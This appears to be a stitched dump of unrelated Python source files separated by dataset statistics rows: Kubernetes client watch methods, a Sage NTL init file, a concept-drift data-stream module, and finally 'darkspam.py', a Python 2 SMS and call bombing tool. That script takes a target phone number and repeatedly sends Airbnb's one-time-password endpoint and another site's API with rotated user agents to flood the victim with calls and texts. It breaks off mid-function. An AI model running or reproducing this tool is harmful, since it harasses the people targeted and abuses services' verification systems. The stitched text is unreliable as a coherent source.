:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: VersionedEvent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'field_selector', 'label_selector', 'pretty', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method watch_certificates_v1alpha1_certificate_signing_request" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `watch_certificates_v1alpha1_certificate_signing_request`")
collection_formats = {}
resource_path = '/apis/certificates.k8s.io/v1alpha1/watch/certificatesigningrequests/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VersionedEvent',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def watch_certificates_v1alpha1_certificate_signing_request_list(self, **kwargs):
"""
watch individual changes to a list of CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.watch_certificates_v1alpha1_certificate_signing_request_list(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: VersionedEvent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.watch_certificates_v1alpha1_certificate_signing_request_list_with_http_info(**kwargs)
else:
(data) = self.watch_certificates_v1alpha1_certificate_signing_request_list_with_http_info(**kwargs)
return data
def watch_certificates_v1alpha1_certificate_signing_request_list_with_http_info(self, **kwargs):
"""
watch individual changes to a list of CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.watch_certificates_v1alpha1_certificate_signing_request_list_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: VersionedEvent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['field_selector', 'label_selector', 'pretty', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method watch_certificates_v1alpha1_certificate_signing_request_list" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/certificates.k8s.io/v1alpha1/watch/certificatesigningrequests'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VersionedEvent',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
| 47.217742 | 198 | 0.614987 | 7,142 | 70,260 | 5.83576 | 0.038645 | 0.046066 | 0.053984 | 0.075674 | 0.971568 | 0.969145 | 0.96749 | 0.959908 | 0.954773 | 0.948439 | 0 | 0.006164 | 0.309636 | 70,260 | 1,487 | 199 | 47.249496 | 0.853108 | 0.367663 | 0 | 0.82808 | 1 | 0 | 0.211768 | 0.100907 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035817 | false | 0 | 0.010029 | 0 | 0.098854 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
036627bbbe56438af8abd7db53d44429b62b25b8 | 70 | py | Python | src/sage/libs/ntl/__init__.py | switzel/sage | 7eb8510dacf61b691664cd8f1d2e75e5d473e5a0 | [
"BSL-1.0"
] | null | null | null | src/sage/libs/ntl/__init__.py | switzel/sage | 7eb8510dacf61b691664cd8f1d2e75e5d473e5a0 | [
"BSL-1.0"
] | null | null | null | src/sage/libs/ntl/__init__.py | switzel/sage | 7eb8510dacf61b691664cd8f1d2e75e5d473e5a0 | [
"BSL-1.0"
] | 1 | 2020-07-24T12:20:37.000Z | 2020-07-24T12:20:37.000Z | from error import setup_NTL_error_callback
setup_NTL_error_callback()
| 23.333333 | 42 | 0.9 | 11 | 70 | 5.181818 | 0.545455 | 0.280702 | 0.45614 | 0.736842 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.071429 | 70 | 2 | 43 | 35 | 0.876923 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
03667e2b41d91a9f5b7c5ccace770b32c3eefbec | 17,294 | py | Python | changeds/datastreams.py | FlopsKa/StreamDatasets-1 | 32a27c079dc70d5cf0009717851ebe207f05524c | [
"MIT"
] | null | null | null | changeds/datastreams.py | FlopsKa/StreamDatasets-1 | 32a27c079dc70d5cf0009717851ebe207f05524c | [
"MIT"
] | null | null | null | changeds/datastreams.py | FlopsKa/StreamDatasets-1 | 32a27c079dc70d5cf0009717851ebe207f05524c | [
"MIT"
] | null | null | null | import os
import pandas as pd
from sklearn.preprocessing import LabelEncoder
from tensorflow import keras
import numpy as np
from skmultiflow.data import led_generator, random_rbf_generator
from changeds.abstract import ChangeStream, RegionalChangeStream, ClassificationStream, RandomOrderChangeStream
from changeds.helper import plot_change_region_2d, preprocess_hipe
class SortedMNIST(ChangeStream, RegionalChangeStream):
def __init__(self, preprocess=None):
(x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()
x_train = np.reshape(x_train, newshape=(len(x_train), x_train.shape[1] * x_train.shape[2]))
x_test = np.reshape(x_test, newshape=(len(x_test), x_test.shape[1] * x_test.shape[2]))
x = np.vstack([x_train, x_test])
y = np.hstack([y_train, y_test])
sorted_indices = np.argsort(y)
x = x[sorted_indices]
y = y[sorted_indices]
if preprocess:
x = preprocess(x)
self._change_points = np.diff(y, prepend=y[0]).astype(bool)
super(SortedMNIST, self).__init__(data=x, y=y)
def id(self) -> str:
return "sMNIST"
def change_points(self):
return self._change_points
def _is_change(self) -> bool:
return self._change_points[self.sample_idx]
def plot_change_region(self, change_idx: int, binary_thresh: float, save: bool, path=None):
plot_change_region_2d(self, change_idx, binary_thresh, save, path)
class RandomOrderMNIST(RandomOrderChangeStream):
def __init__(self, num_changes: int = 100, preprocess=None):
(x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()
x_train = np.reshape(x_train, newshape=(len(x_train), x_train.shape[1] * x_train.shape[2]))
x_test = np.reshape(x_test, newshape=(len(x_test), x_test.shape[1] * x_test.shape[2]))
x = np.vstack([x_train, x_test])
y = np.hstack([y_train, y_test])
data, y, change_points = RandomOrderChangeStream.create_changes(x, y, num_changes)
self._change_points = change_points
if preprocess:
data = preprocess(data)
super(RandomOrderMNIST, self).__init__(data=data, y=y)
def id(self) -> str:
return "MNIST"
def change_points(self):
return self._change_points
def _is_change(self) -> bool:
return self._change_points[self.sample_idx]
class SortedFashionMNIST(ChangeStream, RegionalChangeStream):
def __init__(self, preprocess=None):
(x_train, y_train), (x_test, y_test) = keras.datasets.fashion_mnist.load_data()
x_train = np.reshape(x_train, newshape=(len(x_train), x_train.shape[1] * x_train.shape[2]))
x_test = np.reshape(x_test, newshape=(len(x_test), x_test.shape[1] * x_test.shape[2]))
x = np.vstack([x_train, x_test])
y = np.hstack([y_train, y_test])
sorted_indices = np.argsort(y)
x = x[sorted_indices]
y = y[sorted_indices]
if preprocess:
x = preprocess(x)
self._change_points = np.diff(y, prepend=y[0]).astype(bool)
super(SortedFashionMNIST, self).__init__(data=x, y=y)
def id(self) -> str:
return "sFMNIST"
def change_points(self):
return self._change_points
def _is_change(self) -> bool:
return self._change_points[self.sample_idx]
def plot_change_region(self, change_idx: int, binary_thresh: float, save: bool, path=None):
plot_change_region_2d(self, change_idx, binary_thresh, save, path)
class RandomOrderFashionMNIST(RandomOrderChangeStream):
def __init__(self, num_changes: int = 100, preprocess=None):
(x_train, y_train), (x_test, y_test) = keras.datasets.fashion_mnist.load_data()
x_train = np.reshape(x_train, newshape=(len(x_train), x_train.shape[1] * x_train.shape[2]))
x_test = np.reshape(x_test, newshape=(len(x_test), x_test.shape[1] * x_test.shape[2]))
x = np.vstack([x_train, x_test])
y = np.hstack([y_train, y_test])
data, y, change_points = RandomOrderChangeStream.create_changes(x, y, num_changes)
self._change_points = change_points
if preprocess:
data = preprocess(data)
super(RandomOrderFashionMNIST, self).__init__(data=data, y=y)
def id(self) -> str:
return "FMNIST"
def change_points(self):
return self._change_points
def _is_change(self) -> bool:
return self._change_points[self.sample_idx]
class SortedCIFAR10(ChangeStream, RegionalChangeStream):
def __init__(self, preprocess=None):
(x_train, y_train), (x_test, y_test) = keras.datasets.cifar10.load_data()
x_train = x_train.dot([0.299, 0.587, 0.114])
x_test = x_test.dot([0.299, 0.587, 0.114])
x_train = np.reshape(x_train, newshape=(len(x_train), x_train.shape[1] * x_train.shape[2]))
x_test = np.reshape(x_test, newshape=(len(x_test), x_test.shape[1] * x_test.shape[2]))
x = np.vstack([x_train, x_test])
y = np.hstack([y_train.reshape(-1), y_test.reshape(-1)])
sorted_indices = np.argsort(y)
x = x[sorted_indices]
y = y[sorted_indices]
if preprocess:
x = preprocess(x)
self._change_points = np.diff(y, prepend=y[0]).astype(bool)
super(SortedCIFAR10, self).__init__(data=x, y=y)
def id(self) -> str:
return "sCIFAR"
def change_points(self):
return self._change_points
def _is_change(self) -> bool:
return self._change_points[self.sample_idx]
def plot_change_region(self, change_idx: int, binary_thresh: float, save: bool, path=None):
plot_change_region_2d(self, change_idx, binary_thresh, save, path)
class RandomOrderCIFAR10(RandomOrderChangeStream):
def __init__(self, num_changes: int = 100, preprocess=None):
(x_train, y_train), (x_test, y_test) = keras.datasets.cifar10.load_data()
x_train = x_train.dot([0.299, 0.587, 0.114])
x_test = x_test.dot([0.299, 0.587, 0.114])
x_train = np.reshape(x_train, newshape=(len(x_train), x_train.shape[1] * x_train.shape[2]))
x_test = np.reshape(x_test, newshape=(len(x_test), x_test.shape[1] * x_test.shape[2]))
x = np.vstack([x_train, x_test])
y = np.hstack([y_train.reshape(-1), y_test.reshape(-1)])
data, y, change_points = RandomOrderChangeStream.create_changes(x, y, num_changes)
self._change_points = change_points
if preprocess:
data = preprocess(data)
super(RandomOrderCIFAR10, self).__init__(data=data, y=y)
def id(self) -> str:
return "CIFAR"
def change_points(self):
return self._change_points
def _is_change(self) -> bool:
return self._change_points[self.sample_idx]
class SortedCIFAR100(ChangeStream, RegionalChangeStream):
def __init__(self, preprocess=None):
(x_train, y_train), (x_test, y_test) = keras.datasets.cifar100.load_data()
x_train = x_train.dot([0.299, 0.587, 0.114])
x_test = x_test.dot([0.299, 0.587, 0.114])
x_train = np.reshape(x_train, newshape=(len(x_train), x_train.shape[1] * x_train.shape[2]))
x_test = np.reshape(x_test, newshape=(len(x_test), x_test.shape[1] * x_test.shape[2]))
x = np.vstack([x_train, x_test])
y = np.hstack([y_train.reshape(-1), y_test.reshape(-1)])
sorted_indices = np.argsort(y)
x = x[sorted_indices]
y = y[sorted_indices]
if preprocess:
x = preprocess(x)
self._change_points = np.diff(y, prepend=y[0]).astype(bool)
super(SortedCIFAR100, self).__init__(data=x, y=y)
def id(self) -> str:
return "sCIFAR100"
def change_points(self):
return self._change_points
def _is_change(self) -> bool:
return self._change_points[self.sample_idx]
def plot_change_region(self, change_idx: int, binary_thresh: float, save: bool, path=None):
plot_change_region_2d(self, change_idx, binary_thresh, save, path)
class RandomOrderCIFAR100(RandomOrderChangeStream):
def __init__(self, num_changes: int = 100, preprocess=None):
(x_train, y_train), (x_test, y_test) = keras.datasets.cifar100.load_data()
x_train = x_train.dot([0.299, 0.587, 0.114])
x_test = x_test.dot([0.299, 0.587, 0.114])
x_train = np.reshape(x_train, newshape=(len(x_train), x_train.shape[1] * x_train.shape[2]))
x_test = np.reshape(x_test, newshape=(len(x_test), x_test.shape[1] * x_test.shape[2]))
x = np.vstack([x_train, x_test])
y = np.hstack([y_train.reshape(-1), y_test.reshape(-1)])
data, y, change_points = RandomOrderChangeStream.create_changes(x, y, num_changes)
self._change_points = change_points
if preprocess:
data = preprocess(data)
super(RandomOrderCIFAR100, self).__init__(data=data, y=y)
def id(self) -> str:
return "CIFAR100"
def change_points(self):
return self._change_points
def _is_change(self) -> bool:
return self._change_points[self.sample_idx]
class HIPE(ChangeStream):
def __init__(self, preprocess=None):
x = preprocess_hipe()
y = np.zeros(shape=len(x))
if preprocess:
x = preprocess(x)
self._change_points = y
super(HIPE, self).__init__(data=x, y=y)
def id(self) -> str:
return "HIPE"
def change_points(self):
return self._change_points
def _is_change(self) -> bool:
return self._change_points[self.sample_idx]
class LED(ChangeStream, RegionalChangeStream):
def __init__(self, n_per_concept: int = 10000, n_drifts: int = 10, has_noise=True, preprocess=None):
"""
Creates a sudden, but
:param n_per_concept:
:param n_drifts:
:param has_noise:
:param preprocess:
"""
self.has_noise = has_noise
random_state = 0
x = []
for i in range(n_drifts):
x.append(led_generator.LEDGenerator(random_state=random_state, has_noise=has_noise,
noise_percentage=(i + 1) / n_drifts if i % 2 == 1 else 0
).next_sample(n_per_concept)[0])
y = [i for i in range(n_drifts) for _ in range(n_per_concept)]
x = np.concatenate(x, axis=0)
if preprocess:
x = preprocess(x)
self._change_points = np.diff(y, prepend=y[0]).astype(bool)
super(LED, self).__init__(data=x, y=np.array(y))
def id(self) -> str:
return "LED"
def change_points(self):
return self._change_points
def _is_change(self) -> bool:
return self.change_points()[self.sample_idx]
def approximate_change_regions(self):
if self.has_noise:
return [1 if i < 7 else 0 for i in range(len(self.y))]
else:
return [1 for _ in range(len(self.y))]
def plot_change_region(self, change_idx: int, binary_thresh: float, save: bool, path=None):
raise NotImplementedError
class HAR(ChangeStream):
def __init__(self, preprocess=None):
this_dir, _ = os.path.split(__file__)
path_to_data = os.path.join(this_dir, "..", "data", "har")
test = pd.read_csv(os.path.join(path_to_data, "test.csv"))
train = pd.read_csv(os.path.join(path_to_data, "train.csv"))
x = pd.concat([test, train])
x = x.sort_values(by="Activity")
y = LabelEncoder().fit_transform(x["Activity"])
x = x.drop(["Activity", "subject"], axis=1)
if preprocess:
x = preprocess(x)
self._change_points = np.diff(y, prepend=y[0]).astype(bool)
super(HAR, self).__init__(data=x, y=y)
def id(self) -> str:
return "sHAR"
def change_points(self):
return self._change_points
def _is_change(self) -> bool:
return self._change_points[self.sample_idx]
class RandomOrderHAR(ChangeStream):
def __init__(self, num_changes: int = 100, preprocess=None):
this_dir, _ = os.path.split(__file__)
path_to_data = os.path.join(this_dir, "..", "data", "har")
test = pd.read_csv(os.path.join(path_to_data, "test.csv"))
train = pd.read_csv(os.path.join(path_to_data, "train.csv"))
x = pd.concat([test, train])
x = x.sort_values(by="Activity")
y = LabelEncoder().fit_transform(x["Activity"])
x = x.drop(["Activity", "subject"], axis=1).to_numpy()
if preprocess:
x = preprocess(x)
data, y, change_points = RandomOrderChangeStream.create_changes(x, y, num_changes, shuffle_within_concept=True)
self._change_points = change_points
super(RandomOrderHAR, self).__init__(data=data, y=y)
def id(self) -> str:
return "HAR"
def change_points(self):
return self._change_points
def _is_change(self) -> bool:
return self._change_points[self.sample_idx]
class RBF(ChangeStream, RegionalChangeStream):
def __init__(self, n_per_concept: int = 10000,
n_drifts: int = 10, dims: int = 100,
n_centroids: int = 10, add_dims_without_drift=True, preprocess=None):
self.add_dims_without_drift = add_dims_without_drift
sample_random_state = 0
x = []
no_drift = []
for i in range(n_drifts):
model_random_state = i
x.append(random_rbf_generator.RandomRBFGenerator(model_random_state=model_random_state,
sample_random_state=sample_random_state, n_features=dims,
n_centroids=n_centroids).next_sample(n_per_concept)[0])
if add_dims_without_drift:
no_drift_model_random_state = n_drifts # a random seed that we will not use to create drifts
no_drift.append(random_rbf_generator.RandomRBFGenerator(model_random_state=no_drift_model_random_state,
sample_random_state=sample_random_state,
n_features=dims, n_centroids=n_centroids
).next_sample(n_per_concept)[0])
y = [i for i in range(n_drifts) for _ in range(n_per_concept)]
x = np.concatenate(x, axis=0)
if add_dims_without_drift:
noise = np.concatenate(no_drift, axis=0)
x = np.concatenate([x, noise], axis=1)
if preprocess:
x = preprocess(x)
self._change_points = np.diff(y, prepend=y[0]).astype(bool)
super(RBF, self).__init__(data=x, y=np.array(y))
def id(self) -> str:
return "RBF"
def change_points(self):
return self._change_points
def _is_change(self) -> bool:
return self.change_points()[self.sample_idx]
def approximate_change_regions(self):
if self.add_dims_without_drift:
return [1 if i < len(self.y) / 2 else 0 for i in range(len(self.y))]
else:
return [1 for _ in range(len(self.y))]
def plot_change_region(self, change_idx: int, binary_thresh: float, save: bool, path=None):
raise NotImplementedError
class ArtificialStream(ClassificationStream):
def id(self) -> str:
return self.filename[:-4]
def __init__(self, filename: str):
self.filename = filename
path, _ = os.path.split(__file__)
path = os.path.join(path, "..", "concept-drift-datasets-scikit-multiflow", "artificial")
file_path = os.path.join(path, filename)
assert os.path.exists(file_path), "The requested file does not exist in {}".format(file_path)
super(ArtificialStream, self).__init__(data_path=file_path)
class RealWorldStream(ClassificationStream):
def id(self) -> str:
return self.filename[:-4]
def __init__(self, filename: str):
self.filename = filename
path, _ = os.path.split(__file__)
path = os.path.join(path, "..", "concept-drift-datasets-scikit-multiflow", "real-world")
file_path = os.path.join(path, filename)
assert os.path.exists(file_path), "The requested file does not exist in {}".format(file_path)
super(RealWorldStream, self).__init__(data_path=file_path)
if __name__ == '__main__':
stream = RandomOrderHAR()
print(stream.id())
while stream.has_more_samples():
x, y, is_change = stream.next_sample()
if is_change:
print("Change at index {}".format(stream.sample_idx))
if isinstance(stream, RegionalChangeStream):
change_regions = stream.approximate_change_regions()
stream.plot_change_region(2, binary_thresh=0.5, save=False)
| 40.596244 | 120 | 0.619232 | 2,313 | 17,294 | 4.331604 | 0.085603 | 0.038327 | 0.062282 | 0.057092 | 0.834914 | 0.822537 | 0.804072 | 0.804072 | 0.788502 | 0.785807 | 0 | 0.019287 | 0.262461 | 17,294 | 425 | 121 | 40.691765 | 0.766209 | 0.008674 | 0 | 0.715152 | 0 | 0 | 0.023345 | 0.004681 | 0 | 0 | 0 | 0 | 0.006061 | 1 | 0.193939 | false | 0 | 0.024242 | 0.124242 | 0.4 | 0.006061 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 8 |
88ca28f530132a0ed8fb58efb3edfa53fd5ccc3d | 78,172 | py | Python | DARKspam_2/darkspam_Open.py | Alpha-Demon404/RE-14 | b5b46a9f0eee218f2a642b615c77135c33c6f4ad | [
"MIT"
] | 39 | 2020-02-26T09:44:36.000Z | 2022-03-23T00:18:25.000Z | DARKspam_2/darkspam_Open.py | B4BY-DG/reverse-enginnering | b5b46a9f0eee218f2a642b615c77135c33c6f4ad | [
"MIT"
] | 15 | 2020-05-14T10:07:26.000Z | 2022-01-06T02:55:32.000Z | DARKspam_2/darkspam_Open.py | B4BY-DG/reverse-enginnering | b5b46a9f0eee218f2a642b615c77135c33c6f4ad | [
"MIT"
] | 41 | 2020-03-16T22:36:38.000Z | 2022-03-17T14:47:19.000Z | # Python bytecode 2.7
try:
from getpass import getpass
import subprocess as sp, os, time, sys, requests, random, json
from bs4 import BeautifulSoup as bs
except:
print '%s[%s!%s] %sModule belum terinstall' % (W1, R1, W1, W0)
spin()
os.system('pip2 install requests bs4')
print '%s[%s!%s] %sInstalasi selesai' % (W1, R1, W1, W0)
print '%s[%s!%s] %sRun again' % (W1, R1, W1, W0)
print '%s[%s!%s] %spython2 darkspam.py' % (W1, R1, W1, W0)
metu()
G0 = '\x1b[0;32m'
G1 = '\x1b[1;32m'
C0 = '\x1b[0;36m'
C1 = '\x1b[1;36m'
P0 = '\x1b[0;35m'
P1 = '\x1b[1;35m'
W0 = '\x1b[0;37m'
W1 = '\x1b[1;37m'
B0 = '\x1b[0;34m'
B1 = '\x1b[1;34m'
R0 = '\x1b[0;31m'
R1 = '\x1b[1;31m'
Y1 = '\x1b[1;33m'
Y0 = '\x1b[0;33m'
BG = '\x1b[1;97;41m'
RE = '\x1b[0m'
r = '\x1b[91m'
c = '\x1b[96m'
w = '\x1b[0m'
def wait(t):
for x in range(t):
t -= 1
sys.stdout.write('\r' + '\x1b[1;37m[\x1b[1;31m!\x1b[1;37m]\x1b[0;37m Tunggu ' + str(t) + 's')
sys.stdout.flush()
time.sleep(1)
def spin():
try:
L = '\\|/-'
for q in range(10):
time.sleep(0.1)
sys.stdout.write('\r\x1b[1;32m[\x1b[1;33m' + L[(q % len(L))] + '\x1b[1;32m]\x1b[0;37m Loading please wait...')
sys.stdout.flush()
except:
exit()
def ketik(teks):
for i in teks + '\n':
sys.stdout.write(i)
sys.stdout.flush()
time.sleep(0.001)
def load(word):
lix = ['/', '-', '\xe2\x95\xb2', '|']
for i in range(5):
for x in range(len(lix)):
sys.stdout.write(('\r{}{}').format(str(word), lix[x]))
time.sleep(0.2)
sys.stdout.flush()
def metu():
print '%s[%sx%s] %sExiting Program' % (W1, R1, W1, R0)
exit(1)
def koneksi():
logo()
try:
rq = requests.get('http://github.com')
spin()
print '\n%s[%s#%s] %sKoneksi bagus' % (G1, Y1, G1, W0)
time.sleep(2)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi' % (W1, R1, W1, W0)
time.sleep(1)
metu()
def call():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 628XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
call()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
call()
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
r = requests.Session()
hd = {'content-length': '82', 'origin': 'https://www.airbnb.co.id', 'x-csrf-token': 'V4$.airbnb.co.id$NeEJZxARGJA$r3bBAEtLKJ7cH3yiFNUKlxsckvHI1tHK4uAJADeUn_A=', 'x-csrf-without-token': '1', 'user-agent': '{acak}', 'content-type': 'application/json', 'accept': 'application/json, text/javascript, */*; q=0.01', 'cache-control': 'no-cache', 'x-requested-with': 'XMLHttpRequest', 'referer': 'https://www.airbnb.co.id/signup_login', 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://www.airbnb.co.id/api/v2/phone_one_time_passwords?currency=USD&key=d306zoyjsyarp7ifhu67rjxn52tv0t20&locale=id', headers=hd, json={'phoneNumber': no, 'workFlow': 'GLOBAL_SIGNUP_LOGIN', 'otpMethod': 'CALL'})
if 'true' in a.text:
print '\n%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
wait(60)
else:
print '\n%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
wait(60)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
call()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def src():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 628XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
src()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
src()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
r = requests.Session()
head = {'content-length': '27', 'accept': '*/*', 'origin': 'https://nabil.my.id', 'x-requested-with': 'XMLHttpRequest', 'user-agent': '{acak}', 'content-type': 'application/x-www-form-urlencoded; charset=UTF-8', 'referer': 'https://nabil.my.id/Ayo_Src_Bom', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://nabil.my.id/Tools/Prank-Tools/Ayo-Src/api.php', headers=head, data={'nomor': no, 'jumlah': '1'})
if 'Terkirim' in str(a.text):
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
src()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def air():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 628XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
air()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
air()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
data = {'phoneNumber': no, 'workFlow': 'GLOBAL_SIGNUP_LOGIN', 'otpMethod': 'TEXT'}
datajson = json.dumps(data)
